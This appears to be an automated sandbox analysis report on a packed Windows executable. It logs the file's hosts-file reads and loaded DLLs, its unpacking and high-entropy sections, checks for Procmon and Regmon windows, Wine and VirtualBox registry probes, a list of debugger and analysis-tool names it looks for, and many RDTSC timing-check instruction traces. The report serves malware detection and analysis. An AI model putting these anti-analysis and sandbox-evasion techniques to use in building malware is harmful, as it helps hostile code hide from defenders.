Source: C:\Users\user\Desktop\ZN34wF8WI2.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: ZN34wF8WI2.exeReversingLabs: Detection: 47%
Source: ZN34wF8WI2.exeVirustotal: Detection: 51%
Source: ZN34wF8WI2.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: ZN34wF8WI2.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: ZN34wF8WI2.exeStatic file information: File size 4464640 > 1048576
Source: ZN34wF8WI2.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: ZN34wF8WI2.exeStatic PE information: Raw size of aapkfxsh is bigger than: 0x100000 < 0x1b5400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeUnpacked PE file: 5.2.ZN34wF8WI2.exe.410000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aapkfxsh:EW;ucrzewim:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aapkfxsh:EW;ucrzewim:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: ZN34wF8WI2.exeStatic PE information: real checksum: 0x44b7d8 should be: 0x45056d
Source: ZN34wF8WI2.exeStatic PE information: section name:
Source: ZN34wF8WI2.exeStatic PE information: section name: .idata
Source: ZN34wF8WI2.exeStatic PE information: section name:
Source: ZN34wF8WI2.exeStatic PE information: section name: aapkfxsh
Source: ZN34wF8WI2.exeStatic PE information: section name: ucrzewim
Source: ZN34wF8WI2.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A3F8B8 push eax; ret 5_3_01A3F8B9
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A3F8B8 push eax; ret 5_3_01A3F8B9
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A3C248 pushad ; ret 5_3_01A3C261
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A3C248 pushad ; ret 5_3_01A3C261
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A3F8B8 push eax; ret 5_3_01A3F8B9
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A3F8B8 push eax; ret 5_3_01A3F8B9
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A3C248 pushad ; ret 5_3_01A3C261
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A3C248 pushad ; ret 5_3_01A3C261
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_007941D0 push eax; mov dword ptr [esp], edx5_2_007941D5
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00492340 push eax; mov dword ptr [esp], 00000000h5_2_00492343
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004CC7F0 push eax; mov dword ptr [esp], 00000000h5_2_004CC743
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0046E92D push es; retf 5_2_0046E92E
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00450AC0 push eax; mov dword ptr [esp], 00000000h5_2_00450AC4
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00471430 push eax; mov dword ptr [esp], 00000000h5_2_00471433
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004939A0 push eax; mov dword ptr [esp], 00000000h5_2_004939A3
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0046DAD0 push eax; mov dword ptr [esp], edx5_2_0046DAD1
Source: ZN34wF8WI2.exeStatic PE information: section name: aapkfxsh entropy: 7.956229076953652

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: PROCMON.EXE
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: X64DBG.EXE
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WINDBG.EXE
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD5E04 second address: CD5E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD5E08 second address: CD5E76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC888h 0x00000007 jc 00007F7620BAC876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F7620BAC887h 0x00000015 jp 00007F7620BAC876h 0x0000001b jmp 00007F7620BAC886h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push edi 0x00000028 pop edi 0x00000029 jmp 00007F7620BAC87Dh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD5E76 second address: CD5E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD5E7E second address: CD5E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7620BAC876h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jl 00007F7620BAC876h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD5E91 second address: CD5EA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620C9DE51h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CCF08C second address: CCF0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7620BAC885h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jbe 00007F7620BAC87Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD4FC2 second address: CD4FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD50FC second address: CD5100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD5100 second address: CD5110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 js 00007F7620C9DE50h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD8C94 second address: CD8CE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F7620BAC878h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov ecx, dword ptr [ebp+122D3A6Dh] 0x0000002c push 00000000h 0x0000002e sub dword ptr [ebp+122D2B0Ah], edi 0x00000034 push 8647F087h 0x00000039 pushad 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD8CE5 second address: CD8CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD8CEF second address: CD8D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC880h 0x00000009 popad 0x0000000a popad 0x0000000b add dword ptr [esp], 79B80FF9h 0x00000012 pushad 0x00000013 mov eax, ecx 0x00000015 mov dword ptr [ebp+122D1DBAh], edx 0x0000001b popad 0x0000001c push 00000003h 0x0000001e mov dword ptr [ebp+122D2D4Eh], esi 0x00000024 mov di, A258h 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D1DEAh], edi 0x00000030 push 00000003h 0x00000032 jne 00007F7620BAC876h 0x00000038 push 84BEA832h 0x0000003d pushad 0x0000003e jmp 00007F7620BAC886h 0x00000043 jmp 00007F7620BAC87Eh 0x00000048 popad 0x00000049 xor dword ptr [esp], 44BEA832h 0x00000050 clc 0x00000051 lea ebx, dword ptr [ebp+1244BA5Fh] 0x00000057 push esi 0x00000058 mov cx, di 0x0000005b pop edi 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F7620BAC881h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CD8D84 second address: CD8D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF9042 second address: CF904E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F7620BAC876h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CC8615 second address: CC8641 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F7620C9DE4Ah 0x0000000e jmp 00007F7620C9DE58h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF733B second address: CF736F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7620BAC88Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F7620BAC886h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7620BAC882h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF736F second address: CF7375 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF74A0 second address: CF74AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF7A1C second address: CF7A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF7A22 second address: CF7A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF7A26 second address: CF7A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF7D49 second address: CF7D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF7D4D second address: CF7D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F7620C9DE57h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CEC4CF second address: CEC4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7620BAC876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF81DB second address: CF81F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jnl 00007F7620C9DE46h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F7620C9DE46h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF81F3 second address: CF81F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF81F7 second address: CF820D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7620C9DE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F7620C9DE46h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF8AAE second address: CF8AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF8AB7 second address: CF8AC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7620C9DE46h 0x00000008 ja 00007F7620C9DE46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF8AC7 second address: CF8AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CF8AD1 second address: CF8ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CFBE8A second address: CFBE90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CFE26E second address: CFE272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CFE3DC second address: CFE3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CFE3E0 second address: CFE413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnl 00007F7620C9DE4Eh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CFE413 second address: CFE417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CFD453 second address: CFD461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE4Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CFD461 second address: CFD465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D04ADE second address: D04AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D04AE2 second address: D04AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D04AEC second address: D04AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D04AF0 second address: D04B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D04C52 second address: D04C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D04C5B second address: D04C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D04C5F second address: D04C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D052FC second address: D05300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D05300 second address: D05332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7620C9DE55h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D05332 second address: D05338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D05338 second address: D0533C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0852D second address: D08555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jmp 00007F7620BAC883h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F7620BAC876h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D08555 second address: D08569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D08569 second address: D0856E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0856E second address: D08585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F7620C9DE4Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D08872 second address: D0887D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7620BAC876h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0887D second address: D08883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D08C57 second address: D08C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F7620BAC876h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D08C6D second address: D08C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D09468 second address: D09472 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7620BAC876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
